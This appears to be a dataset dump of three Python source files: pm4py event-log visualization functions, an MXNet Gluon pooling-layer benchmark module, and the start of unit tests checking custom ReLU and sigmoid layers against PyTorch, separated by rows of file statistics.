file_path
Destination path
attributes
Attributes that should be used to construct the dotted chart (for example, ["concept:name", "org:resource"])
"""
general_checks_classical_event_log(log)
format = os.path.splitext(file_path)[1][1:]
log, attributes = __dotted_attribute_selection(log, attributes)
from pm4py.visualization.dotted_chart import visualizer as dotted_chart_visualizer
gviz = dotted_chart_visualizer.apply(log, attributes, parameters={"format": format})
dotted_chart_visualizer.save(gviz, file_path)
def view_sna(sna_metric):
"""
Represents a SNA metric (.html)
Parameters
---------------
sna_metric
Values of the metric
"""
from pm4py.visualization.sna import visualizer as sna_visualizer
gviz = sna_visualizer.apply(sna_metric, variant=sna_visualizer.Variants.PYVIS)
sna_visualizer.view(gviz)
def save_vis_sna(sna_metric, file_path: str):
"""
Saves the visualization of a SNA metric in a .html file
Parameters
----------------
sna_metric
Values of the metric
file_path
Destination path
"""
from pm4py.visualization.sna import visualizer as sna_visualizer
gviz = sna_visualizer.apply(sna_metric, variant=sna_visualizer.Variants.PYVIS)
sna_visualizer.save(gviz, file_path)
def view_case_duration_graph(log: Union[EventLog, pd.DataFrame], format: str = "png"):
"""
Visualizes the case duration graph
Parameters
-----------------
log
Log object
format
Format of the visualization (png, svg, ...)
"""
general_checks_classical_event_log(log)
if check_is_pandas_dataframe(log):
check_pandas_dataframe_columns(log)
from pm4py.statistics.traces.generic.pandas import case_statistics
graph = case_statistics.get_kde_caseduration(log, parameters=get_properties(log))
else:
from pm4py.statistics.traces.generic.log import case_statistics
graph = case_statistics.get_kde_caseduration(log, parameters=get_properties(log))
from pm4py.visualization.graphs import visualizer as graphs_visualizer
graph_vis = graphs_visualizer.apply(graph[0], graph[1], variant=graphs_visualizer.Variants.CASES,
parameters={"format": format})
graphs_visualizer.view(graph_vis)
def save_vis_case_duration_graph(log: Union[EventLog, pd.DataFrame], file_path: str):
"""
Saves the case duration graph in the specified path
Parameters
----------------
log
Log object
file_path
Destination path
"""
general_checks_classical_event_log(log)
if check_is_pandas_dataframe(log):
check_pandas_dataframe_columns(log)
from pm4py.statistics.traces.generic.pandas import case_statistics
graph = case_statistics.get_kde_caseduration(log, parameters=get_properties(log))
else:
from pm4py.statistics.traces.generic.log import case_statistics
graph = case_statistics.get_kde_caseduration(log, parameters=get_properties(log))
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.graphs import visualizer as graphs_visualizer
graph_vis = graphs_visualizer.apply(graph[0], graph[1], variant=graphs_visualizer.Variants.CASES,
parameters={"format": format})
graphs_visualizer.save(graph_vis, file_path)
def view_events_per_time_graph(log: Union[EventLog, pd.DataFrame], format: str = "png"):
"""
Visualizes the events per time graph
Parameters
-----------------
log
Log object
format
Format of the visualization (png, svg, ...)
"""
general_checks_classical_event_log(log)
if check_is_pandas_dataframe(log):
check_pandas_dataframe_columns(log)
from pm4py.statistics.attributes.pandas import get as attributes_get
graph = attributes_get.get_kde_date_attribute(log, parameters=get_properties(log))
else:
from pm4py.statistics.attributes.log import get as attributes_get
graph = attributes_get.get_kde_date_attribute(log, parameters=get_properties(log))
from pm4py.visualization.graphs import visualizer as graphs_visualizer
graph_vis = graphs_visualizer.apply(graph[0], graph[1], variant=graphs_visualizer.Variants.DATES,
parameters={"format": format})
graphs_visualizer.view(graph_vis)
def save_vis_events_per_time_graph(log: Union[EventLog, pd.DataFrame], file_path: str):
"""
Saves the events per time graph in the specified path
Parameters
----------------
log
Log object
file_path
Destination path
"""
general_checks_classical_event_log(log)
if check_is_pandas_dataframe(log):
check_pandas_dataframe_columns(log)
from pm4py.statistics.attributes.pandas import get as attributes_get
graph = attributes_get.get_kde_date_attribute(log, parameters=get_properties(log))
else:
from pm4py.statistics.attributes.log import get as attributes_get
graph = attributes_get.get_kde_date_attribute(log, parameters=get_properties(log))
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.graphs import visualizer as graphs_visualizer
graph_vis = graphs_visualizer.apply(graph[0], graph[1], variant=graphs_visualizer.Variants.DATES,
parameters={"format": format})
graphs_visualizer.save(graph_vis, file_path)
def view_performance_spectrum(log: Union[EventLog, pd.DataFrame], activities: List[str], format: str = "png"):
"""
Displays the performance spectrum
Parameters
----------------
perf_spectrum
Performance spectrum
format
Format of the visualization (png, svg ...)
"""
general_checks_classical_event_log(log)
from pm4py.algo.discovery.performance_spectrum import algorithm as performance_spectrum
perf_spectrum = performance_spectrum.apply(log, activities, parameters=get_properties(log))
from pm4py.visualization.performance_spectrum import visualizer as perf_spectrum_visualizer
from pm4py.visualization.performance_spectrum.variants import neato
gviz = perf_spectrum_visualizer.apply(perf_spectrum, parameters={neato.Parameters.FORMAT.value: format})
perf_spectrum_visualizer.view(gviz)
def save_vis_performance_spectrum(log: Union[EventLog, pd.DataFrame], activities: List[str], file_path: str):
"""
Saves the visualization of the performance spectrum to a file
Parameters
---------------
log
Event log
activities
List of activities (in order) that is used to build the performance spectrum
file_path
Destination path (including the extension)
"""
general_checks_classical_event_log(log)
from pm4py.algo.discovery.performance_spectrum import algorithm as performance_spectrum
perf_spectrum = performance_spectrum.apply(log, activities, parameters=get_properties(log))
from pm4py.visualization.performance_spectrum import visualizer as perf_spectrum_visualizer
from pm4py.visualization.performance_spectrum.variants import neato
format = os.path.splitext(file_path)[1][1:]
gviz = perf_spectrum_visualizer.apply(perf_spectrum, parameters={neato.Parameters.FORMAT.value: format})
perf_spectrum_visualizer.save(gviz, file_path)
def __builds_events_distribution_graph(log: Union[EventLog, pd.DataFrame], distr_type: str = "days_week"):
"""
Internal method to build the events distribution graph
"""
general_checks_classical_event_log(log)
if distr_type == "days_month":
title = "Distribution of the Events over the Days of a Month";
x_axis = "Day of month";
y_axis = "Number of Events"
elif distr_type == "months":
title = "Distribution of the Events over the Months";
x_axis = "Month";
y_axis = "Number of Events"
elif distr_type == "years":
title = "Distribution of the Events over the Years";
x_axis = "Year";
y_axis = "Number of Events"
elif distr_type == "hours":
title = "Distribution of the Events over the Hours";
x_axis = "Hour (of day)";
y_axis = "Number of Events"
elif distr_type == "days_week":
title = "Distribution of the Events over the Days of a Week";
x_axis = "Day of the Week";
y_axis = "Number of Events"
else:
raise Exception("unsupported distribution specified.")
if check_is_pandas_dataframe(log):
check_pandas_dataframe_columns(log)
from pm4py.statistics.attributes.pandas import get as attributes_get
x, y = attributes_get.get_events_distribution(log, distr_type=distr_type, parameters=get_properties(log))
else:
from pm4py.statistics.attributes.log import get as attributes_get
x, y = attributes_get.get_events_distribution(log, distr_type=distr_type, parameters=get_properties(log))
return title, x_axis, y_axis, x, y
def view_events_distribution_graph(log: Union[EventLog, pd.DataFrame], distr_type: str = "days_week", format="png"):
"""
Shows the distribution of the events in the specified dimension
Parameters
----------------
log
Event log
distr_type
Type of distribution (default: days_week):
- days_month => Gets the distribution of the events among the days of a month (from 1 to 31)
- months => Gets the distribution of the events among the months (from 1 to 12)
- years => Gets the distribution of the events among the years of the event log
- hours => Gets the distribution of the events among the hours of a day (from 0 to 23)
- days_week => Gets the distribution of the events among the days of a week (from Monday to Sunday)
format
Format of the visualization (default: png)
"""
general_checks_classical_event_log(log)
title, x_axis, y_axis, x, y = __builds_events_distribution_graph(log, distr_type)
parameters = copy(get_properties(log))
parameters["title"] = title;
parameters["x_axis"] = x_axis;
parameters["y_axis"] = y_axis;
parameters["format"] = format
from pm4py.visualization.graphs import visualizer as graphs_visualizer
gviz = graphs_visualizer.apply(x, y, variant=graphs_visualizer.Variants.BARPLOT, parameters=parameters)
graphs_visualizer.view(gviz)
def save_vis_events_distribution_graph(log: Union[EventLog, pd.DataFrame], file_path: str,
distr_type: str = "days_week"):
"""
Saves the distribution of the events in a picture file
Parameters
----------------
log
Event log
file_path
Destination path (including the extension)
distr_type
Type of distribution (default: days_week):
- days_month => Gets the distribution of the events among the days of a month (from 1 to 31)
- months => Gets the distribution of the events among the months (from 1 to 12)
- years => Gets the distribution of the events among the years of the event log
- hours => Gets the distribution of the events among the hours of a day (from 0 to 23)
- days_week => Gets the distribution of the events among the days of a week (from Monday to Sunday)
"""
general_checks_classical_event_log(log)
format = os.path.splitext(file_path)[1][1:]
title, x_axis, y_axis, x, y = __builds_events_distribution_graph(log, distr_type)
parameters = copy(get_properties(log))
parameters["title"] = title;
parameters["x_axis"] = x_axis;
parameters["y_axis"] = y_axis;
parameters["format"] = format
from pm4py.visualization.graphs import visualizer as graphs_visualizer
gviz = graphs_visualizer.apply(x, y, variant=graphs_visualizer.Variants.BARPLOT, parameters=parameters)
graphs_visualizer.save(gviz, file_path)
def view_ocdfg(ocdfg: Dict[str, Any], annotation: str = "frequency", act_metric: str = "events", edge_metric="event_couples", act_threshold: int = 0, edge_threshold: int = 0, performance_aggregation: str = "mean", format: str = "png"):
"""
Views an OC-DFG (object-centric directly-follows graph) with the provided configuration.
Parameters
----------
ocdfg
Object-centric directly-follows graph
annotation
The annotation to use for the visualization. Values:
- "frequency": frequency annotation
- "performance": performance annotation
act_metric
The metric to use for the activities. Available values:
- "events" => number of events (default)
- "unique_objects" => number of unique objects
- "total_objects" => number of total objects
edge_metric
The metric to use for the edges. Available values:
- "event_couples" => number of event couples (default)
- "unique_objects" => number of unique objects
- "total_objects" => number of total objects
act_threshold
The threshold to apply on the activities frequency (default: 0). Only activities
having a frequency >= than this are kept in the graph.
edge_threshold
The threshold to apply on the edges frequency (default 0). Only edges
having a frequency >= than this are kept in the graph.
performance_aggregation
The aggregation measure to use for the performance: mean, median, min, max, sum
format
The format of the output visualization (default: "png")
"""
from pm4py.visualization.ocel.ocdfg import visualizer
from pm4py.visualization.ocel.ocdfg.variants import classic
parameters = {}
parameters[classic.Parameters.FORMAT] = format
parameters[classic.Parameters.ANNOTATION] = annotation
parameters[classic.Parameters.ACT_METRIC] = act_metric
parameters[classic.Parameters.EDGE_METRIC] = edge_metric
parameters[classic.Parameters.ACT_THRESHOLD] = act_threshold
parameters[classic.Parameters.EDGE_THRESHOLD] = edge_threshold
parameters[classic.Parameters.PERFORMANCE_AGGREGATION_MEASURE] = performance_aggregation
gviz = classic.apply(ocdfg, parameters=parameters)
visualizer.view(gviz)
def save_vis_ocdfg(ocdfg: Dict[str, Any], file_path: str, annotation: str = "frequency", act_metric: str = "events", edge_metric="event_couples", act_threshold: int = 0, edge_threshold: int = 0, performance_aggregation: str = "mean"):
"""
Saves the visualization of an OC-DFG (object-centric directly-follows graph) with the provided configuration.
Parameters
----------
ocdfg
Object-centric directly-follows graph
file_path
Destination path (including the extension)
annotation
The annotation to use for the visualization. Values:
- "frequency": frequency annotation
- "performance": performance annotation
act_metric
The metric to use for the activities. Available values:
- "events" => number of events (default)
- "unique_objects" => number of unique objects
- "total_objects" => number of total objects
edge_metric
The metric to use for the edges. Available values:
- "event_couples" => number of event couples (default)
- "unique_objects" => number of unique objects
- "total_objects" => number of total objects
act_threshold
The threshold to apply on the activities frequency (default: 0). Only activities
having a frequency >= than this are kept in the graph.
edge_threshold
The threshold to apply on the edges frequency (default 0). Only edges
having a frequency >= than this are kept in the graph.
performance_aggregation
The aggregation measure to use for the performance: mean, median, min, max, sum
"""
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.ocel.ocdfg import visualizer
from pm4py.visualization.ocel.ocdfg.variants import classic
parameters = {}
parameters[classic.Parameters.FORMAT] = format
parameters[classic.Parameters.ANNOTATION] = annotation
parameters[classic.Parameters.ACT_METRIC] = act_metric
parameters[classic.Parameters.EDGE_METRIC] = edge_metric
parameters[classic.Parameters.ACT_THRESHOLD] = act_threshold
parameters[classic.Parameters.EDGE_THRESHOLD] = edge_threshold
parameters[classic.Parameters.PERFORMANCE_AGGREGATION_MEASURE] = performance_aggregation
gviz = classic.apply(ocdfg, parameters=parameters)
visualizer.save(gviz, file_path)
| 38.540323 | 235 | 0.697322 | 3,505 | 28,674 | 5.517261 | 0.082168 | 0.025132 | 0.036405 | 0.020219 | 0.867825 | 0.83866 | 0.818802 | 0.770762 | 0.749871 | 0.740614 | 0 | 0.005237 | 0.214131 | 28,674 | 743 | 236 | 38.592194 | 0.852933 | 0.309514 | 0 | 0.70068 | 0 | 0 | 0.037515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.20068 | 0 | 0.302721 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fb3415daeb77fcfe95e9329cd8e678377bd6757d | 16,202 | py | Python | mxnet_benchmarks/nn_operations/pooling_operations.py | sandeep-krishnamurthy/dl-operator-benchmark | 965797d2b847c840a4b8ef29c70c631f6642890a | [
"Apache-2.0"
] | 6 | 2019-05-01T22:05:05.000Z | 2020-02-13T19:07:27.000Z | mxnet_benchmarks/nn_operations/pooling_operations.py | sandeep-krishnamurthy/dl-operator-benchmark | 965797d2b847c840a4b8ef29c70c631f6642890a | [
"Apache-2.0"
] | 2 | 2019-11-09T06:38:09.000Z | 2019-11-09T06:41:44.000Z | mxnet_benchmarks/nn_operations/pooling_operations.py | sandeep-krishnamurthy/dl-operator-benchmark | 965797d2b847c840a4b8ef29c70c631f6642890a | [
"Apache-2.0"
] | null | null | null | import mxnet as mx
import mxnet.ndarray as nd
from mxnet.gluon import nn
from utils.common_utils import get_class_members_in_module
from mxnet_benchmarks.utils.gluon_utils import block_forward_backward_and_time
from mxnet_benchmarks.utils.ndarray_utils import get_mx_ndarray
from mxnet_benchmarks.MXNetOperatorBenchmark import MXNetOperatorBenchmarkBase
""" Performance benchmark tests for MXNet Gluon Pooling Layers
1. MaxPool1D
2. MaxPool2D
3. AvgPool1D
4. AvgPool2D
5. GlobalMaxPool1D
6. GlobalMaxPool2D
7. GlobalAvgPool1D
8. GlobalAvgPool2D
"""
class MaxPool1D(MXNetOperatorBenchmarkBase):
"""Helps to benchmark Gluon MaxPool1D Block.
By default, benchmarks both forward and backward pass on the MaxPool1D block with pool_size 2, no strides,
padding 0 with layout (N, C, W) on input of shape (32, 3, 256).
This setting is influenced from ResNet architecture. By default run on 'float32' precision.
"""
def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
# Set the default Inputs
default_parameters = {"data": (32, 3, 256),
"data_initializer": nd.normal,
"pool_size": 2,
"strides": None,
"padding": 0,
"layout": "NCW",
"run_backward": True,
"dtype": "float32"}
super().__init__(ctx=ctx, warmup=warmup, runs=runs, default_parameters=default_parameters,
custom_parameters=inputs)
self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
dtype=self.inputs["dtype"],
initializer=self.inputs["data_initializer"],
attach_grad=self.inputs["run_backward"])
self.block = nn.MaxPool1D(pool_size=self.inputs["pool_size"],
strides=self.inputs["strides"],
padding=self.inputs["padding"],
layout=self.inputs["layout"])
self.block.initialize(ctx=self.ctx)
def run_benchmark(self):
# Warm up, ignore execution time value
_, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
# Run Benchmarks
exe_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
self.results["MX_Gluon_Imperative_MaxPool1D_Forward_Backward_Time"] = exe_time / self.runs
class MaxPool2D(MXNetOperatorBenchmarkBase):
"""Helps to benchmark Gluon MaxPool2D Block.
By default, benchmarks both forward and backward pass on the MaxPool2D block with (2, 2) pool_size, no strides,
(0, 0) padding with layout (N, C, H, W) on input of shape (32, 3, 256, 256).
This setting is derived from ResNet architecture. By default run on 'float32' precision.
"""
def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
# Set the default Inputs
default_parameters = {"data": (32, 3, 256, 256),
"data_initializer": nd.normal,
"pool_size": (2, 2),
"strides": None,
"padding": (0, 0),
"layout": "NCHW",
"run_backward": True,
"dtype": "float32"}
super().__init__(ctx=ctx, warmup=warmup, runs=runs, default_parameters=default_parameters,
custom_parameters=inputs)
self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
dtype=self.inputs["dtype"],
initializer=self.inputs["data_initializer"],
attach_grad=self.inputs["run_backward"])
self.block = nn.MaxPool2D(pool_size=self.inputs["pool_size"],
strides=self.inputs["strides"],
padding=self.inputs["padding"],
layout=self.inputs["layout"])
self.block.initialize(ctx=self.ctx)
def run_benchmark(self):
# Warm up, ignore execution time value
_, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
# Run Benchmarks
exe_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
self.results["MX_Gluon_Imperative_MaxPool2D_Forward_Backward_Time"] = exe_time / self.runs
class AvgPool1D(MXNetOperatorBenchmarkBase):
"""Helps to benchmark Gluon AvgPool1D Block.
By default, benchmarks both forward and backward pass on the AvgPool1D block with pool_size 2, no strides,
padding 0 with layout (N, C, W) on input of shape (32, 3, 256).
This setting is influenced from ResNet architecture. By default run on 'float32' precision.
"""
def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
# Set the default Inputs
default_parameters = {"data": (32, 3, 256),
"data_initializer": nd.normal,
"pool_size": 2,
"strides": None,
"padding": 0,
"layout": "NCW",
"run_backward": True,
"dtype": "float32"}
super().__init__(ctx=ctx, warmup=warmup, runs=runs, default_parameters=default_parameters,
custom_parameters=inputs)
self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
dtype=self.inputs["dtype"],
initializer=self.inputs["data_initializer"],
attach_grad=self.inputs["run_backward"])
self.block = nn.AvgPool1D(pool_size=self.inputs["pool_size"],
strides=self.inputs["strides"],
padding=self.inputs["padding"],
layout=self.inputs["layout"])
self.block.initialize(ctx=self.ctx)
def run_benchmark(self):
# Warm up, ignore execution time value
_, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
# Run Benchmarks
exe_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
self.results["MX_Gluon_Imperative_AvgPool1D_Forward_Backward_Time"] = exe_time / self.runs
class AvgPool2D(MXNetOperatorBenchmarkBase):
"""Helps to benchmark Gluon AvgPool2D Block.
By default, benchmarks both forward and backward pass on the AvgPool2D block with (2, 2) pool_size, no strides,
(0, 0) padding with layout (N, C, H, W) on input of shape (32, 3, 256, 256).
This setting is derived from ResNet architecture. By default run on 'float32' precision.
"""
def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
# Set the default Inputs
default_parameters = {"data": (32, 3, 256, 256),
"data_initializer": nd.normal,
"pool_size": (2, 2),
"strides": None,
"padding": (0, 0),
"layout": "NCHW",
"run_backward": True,
"dtype": "float32"}
super().__init__(ctx=ctx, warmup=warmup, runs=runs, default_parameters=default_parameters,
custom_parameters=inputs)
self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
dtype=self.inputs["dtype"],
initializer=self.inputs["data_initializer"],
attach_grad=self.inputs["run_backward"])
self.block = nn.AvgPool2D(pool_size=self.inputs["pool_size"],
strides=self.inputs["strides"],
padding=self.inputs["padding"],
layout=self.inputs["layout"])
self.block.initialize(ctx=self.ctx)
def run_benchmark(self):
# Warm up, ignore execution time value
_, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
# Run Benchmarks
exe_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
self.results["MX_Gluon_Imperative_AvgPool2D_Forward_Backward_Time"] = exe_time / self.runs
class GlobalMaxPool1D(MXNetOperatorBenchmarkBase):
"""Helps to benchmark Gluon GlobalMaxPool1D Block.
By default, benchmarks both forward and backward pass on the GlobalMaxPool1D block with layout (N, C, W)
on input of shape (32, 3, 256). By default run on 'float32' precision.
"""
def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
# Set the default Inputs
default_parameters = {"data": (32, 3, 256),
"data_initializer": nd.normal,
"layout": "NCW",
"run_backward": True,
"dtype": "float32"}
super().__init__(ctx=ctx, warmup=warmup, runs=runs, default_parameters=default_parameters,
custom_parameters=inputs)
self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
dtype=self.inputs["dtype"],
initializer=self.inputs["data_initializer"],
attach_grad=self.inputs["run_backward"])
self.block = nn.GlobalMaxPool1D(layout=self.inputs["layout"])
self.block.initialize(ctx=self.ctx)
def run_benchmark(self):
# Warm up, ignore execution time value
_, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
# Run Benchmarks
exe_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
self.results["MX_Gluon_Imperative_GlobalMaxPool1D_Forward_Backward_Time"] = exe_time / self.runs
class GlobalMaxPool2D(MXNetOperatorBenchmarkBase):
"""Helps to benchmark Gluon GlobalMaxPool1D Block.
By default, benchmarks both forward and backward pass on the GlobalMaxPool1D block with layout (N, C, H, W)
on input of shape (32, 3, 256, 256). By default run on 'float32' precision.
"""
def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
# Set the default Inputs
default_parameters = {"data": (32, 3, 256, 256),
"data_initializer": nd.normal,
"layout": "NCHW",
"run_backward": True,
"dtype": "float32"}
super().__init__(ctx=ctx, warmup=warmup, runs=runs, default_parameters=default_parameters,
custom_parameters=inputs)
self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
dtype=self.inputs["dtype"],
initializer=self.inputs["data_initializer"],
attach_grad=self.inputs["run_backward"])
self.block = nn.GlobalMaxPool2D(layout=self.inputs["layout"])
self.block.initialize(ctx=self.ctx)
def run_benchmark(self):
# Warm up, ignore execution time value
_, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
# Run Benchmarks
exe_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
self.results["MX_Gluon_Imperative_GlobalMaxPool2D_Forward_Backward_Time"] = exe_time / self.runs
class GlobalAvgPool1D(MXNetOperatorBenchmarkBase):
"""Helps to benchmark Gluon GlobalAvgPool1D Block.
By default, benchmarks both forward and backward pass on the GlobalAvgPool1D block with layout (N, C, W)
on input of shape (32, 3, 256). By default run on 'float32' precision.
"""
def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
# Set the default Inputs
default_parameters = {"data": (32, 3, 256),
"data_initializer": nd.normal,
"layout": "NCW",
"run_backward": True,
"dtype": "float32"}
super().__init__(ctx=ctx, warmup=warmup, runs=runs, default_parameters=default_parameters,
custom_parameters=inputs)
self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
dtype=self.inputs["dtype"],
initializer=self.inputs["data_initializer"],
attach_grad=self.inputs["run_backward"])
self.block = nn.GlobalAvgPool1D(layout=self.inputs["layout"])
self.block.initialize(ctx=self.ctx)
def run_benchmark(self):
# Warm up, ignore execution time value
_, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
# Run Benchmarks
exe_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
self.results["MX_Gluon_Imperative_GlobalAvgPool1D_Forward_Backward_Time"] = exe_time / self.runs
class GlobalAvgPool2D(MXNetOperatorBenchmarkBase):
"""Helps to benchmark Gluon GlobalAvgPool2D Block.
By default, benchmarks both forward and backward pass on the GlobalAvgPool2D block with layout (N, C, H, W)
on input of shape (32, 3, 256, 256). By default run on 'float32' precision.
"""
def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
# Set the default Inputs
default_parameters = {"data": (32, 3, 256, 256),
"data_initializer": nd.normal,
"layout": "NCHW",
"run_backward": True,
"dtype": "float32"}
super().__init__(ctx=ctx, warmup=warmup, runs=runs, default_parameters=default_parameters,
custom_parameters=inputs)
self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
dtype=self.inputs["dtype"],
initializer=self.inputs["data_initializer"],
attach_grad=self.inputs["run_backward"])
self.block = nn.GlobalAvgPool2D(layout=self.inputs["layout"])
self.block.initialize(ctx=self.ctx)
def run_benchmark(self):
# Warm up, ignore execution time value
_, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
# Run Benchmarks
exe_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
self.results["MX_Gluon_Imperative_GlobalAvgPool2D_Forward_Backward_Time"] = exe_time / self.runs
# Utilities
def run_all_gluon_nn_pooling_operations_benchmarks(ctx, inputs):
"""Helper to run all Gluon Pooling Layer benchmarks. Just runs the benchmarks with default input values.
This is just a utility to run benchmarks with all default input values.
:return: list[dict], list of dictionary of benchmark results. Each item in the list is a dictionary of benchmark
results per operator.
"""
pooling_operations_results = []
members = get_class_members_in_module(__name__)
for _, cls in members:
benchmark_ref = cls(ctx=ctx, inputs=inputs)
benchmark_ref.run_benchmark()
benchmark_ref.print_benchmark_results()
pooling_operations_results.append(benchmark_ref.get_benchmark_results())
return pooling_operations_results
| 43.789189 | 116 | 0.592087 | 1,817 | 16,202 | 5.069345 | 0.075399 | 0.056454 | 0.036912 | 0.042449 | 0.850939 | 0.812398 | 0.812398 | 0.808707 | 0.779069 | 0.779069 | 0 | 0.02282 | 0.307616 | 16,202 | 369 | 117 | 43.907859 | 0.798271 | 0.19226 | 0 | 0.791667 | 0 | 0 | 0.10949 | 0.034077 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088542 | false | 0 | 0.036458 | 0 | 0.171875 | 0.005208 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
34893a29455dcad93aab67b63aa05e01f3583831 | 9,581 | py | Python | tests/dl_test/layers/activation_test.py | nuka137/DeepLearningFramework | 613881e46b48c2206b9424a49106455cb2336d2e | [
"MIT"
] | 10 | 2020-06-28T05:50:41.000Z | 2022-01-30T01:31:43.000Z | tests/dl_test/layers/activation_test.py | nuka137/DeepLearningFramework | 613881e46b48c2206b9424a49106455cb2336d2e | [
"MIT"
] | null | null | null | tests/dl_test/layers/activation_test.py | nuka137/DeepLearningFramework | 613881e46b48c2206b9424a49106455cb2336d2e | [
"MIT"
] | 1 | 2020-07-26T12:36:32.000Z | 2020-07-26T12:36:32.000Z | import numpy as np
import torch
import torch.nn.functional as F
import random
from dl.layers.activation import(
ReluLayer,
SigmoidLayer,
TanhLayer,
SoftmaxWithLossLayer,
)
from .. import common
class ReluLayerTest(common.DlTestBase):
name = "ReluLayerTest"
module_name = __module__
def setUp(self):
super().setUp()
random.seed(1)
np.random.seed(1)
torch.manual_seed(1)
def tearDown(self):
super().tearDown()
def test_foward_case_1(self):
layer = ReluLayer()
layer.initialize_parameters()
x = np.array([[1.0, 2.0], [3.0, 4.0]])
actual = layer.forward(x)
x_torch = self.numpy_to_torch(x)
expect_torch = F.relu(x_torch)
expect = self.torch_to_numpy(expect_torch)
self.assertEquals(expect.shape, actual.shape)
self.assertClose(expect, actual)
def test_forward_case_2(self):
layer = ReluLayer()
layer.initialize_parameters()
x = np.array([[-3.0, 4.0]])
actual = layer.forward(x)
x_torch = self.numpy_to_torch(x)
expect_torch = F.relu(x_torch)
expect = self.torch_to_numpy(expect_torch)
self.assertEquals(expect.shape, actual.shape)
self.assertClose(expect, actual)
def test_backward_cast_1(self):
layer = ReluLayer()
layer.initialize_parameters()
x = np.array([[1.0, 2.0], [3.0, 4.0]])
y = layer.forward(x)
dy = np.ones(y.shape)
dx_actual = layer.backward(dy)
x_torch = self.numpy_to_torch(x, requires_grad=True)
y_torch = F.relu(x_torch)
dy_torch = torch.ones(y_torch.shape)
y_torch.backward(gradient=dy_torch)
dx_torch = x_torch.grad
dx_expect = self.torch_to_numpy(dx_torch)
self.assertEquals(dx_actual.shape, dx_expect.shape)
self.assertClose(dx_expect, dx_actual)
def test_backward_cast_2(self):
layer = ReluLayer()
layer.initialize_parameters()
x = np.array([[-3.0, 4.0]])
y = layer.forward(x)
dy = np.ones(y.shape)
dx_actual = layer.backward(dy)
x_torch = self.numpy_to_torch(x, requires_grad=True)
y_torch = F.relu(x_torch)
dy_torch = torch.ones(y_torch.shape)
y_torch.backward(gradient=dy_torch)
dx_torch = x_torch.grad
dx_expect = self.torch_to_numpy(dx_torch)
self.assertEquals(dx_actual.shape, dx_expect.shape)
self.assertClose(dx_expect, dx_actual)
class SigmoidLayerTest(common.DlTestBase):
name = "SigmoidLayer"
module_name = __module__
def setUp(self):
super().setUp()
random.seed(1)
np.random.seed(1)
torch.manual_seed(1)
def tearDown(self):
super().tearDown()
def test_foward_case_1(self):
layer = SigmoidLayer()
layer.initialize_parameters()
x = np.array([[1.0, 2.0], [3.0, 4.0]])
actual = layer.forward(x)
x_torch = self.numpy_to_torch(x)
expect_torch = torch.sigmoid(x_torch)
expect = self.torch_to_numpy(expect_torch)
self.assertEquals(expect.shape, actual.shape)
self.assertClose(expect, actual)
def test_forward_case_2(self):
layer = SigmoidLayer()
layer.initialize_parameters()
x = np.array([[-3.0, 4.0]])
actual = layer.forward(x)
x_torch = self.numpy_to_torch(x)
expect_torch = torch.sigmoid(x_torch)
expect = self.torch_to_numpy(expect_torch)
self.assertEquals(expect.shape, actual.shape)
self.assertClose(expect, actual)
def test_backward_cast_1(self):
layer = SigmoidLayer()
layer.initialize_parameters()
x = np.array([[1.0, 2.0], [3.0, 4.0]])
y = layer.forward(x)
dy = np.ones(y.shape)
dx_actual = layer.backward(dy)
x_torch = self.numpy_to_torch(x, requires_grad=True)
y_torch = torch.sigmoid(x_torch)
dy_torch = torch.ones(y_torch.shape)
y_torch.backward(gradient=dy_torch)
dx_torch = x_torch.grad
